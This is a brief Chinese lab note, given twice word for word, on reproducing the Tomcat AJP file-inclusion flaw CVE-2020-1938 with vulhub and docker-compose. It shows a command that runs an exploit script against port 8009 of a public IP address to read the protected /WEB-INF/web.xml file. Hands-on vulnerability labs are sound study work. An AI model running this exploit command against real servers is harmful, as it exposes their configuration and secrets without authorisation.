1.环境搭建
cd /vulhub/tomcat/CVE-2020-1938
docker-compose up -d 一键启动容器
2.使用python脚本运行
python cve-2020-1938.py -p 8009 -f /WEB-INF/web.xml 47.121.211.205
可以查看web.xml信息 说明存在文件包含漏洞
1.环境搭建
cd /vulhub/tomcat/CVE-2020-1938
docker-compose up -d 一键启动容器
2.使用python脚本运行
python cve-2020-1938.py -p 8009 -f /WEB-INF/web.xml 47.121.211.205
可以查看web.xml信息 说明存在文件包含漏洞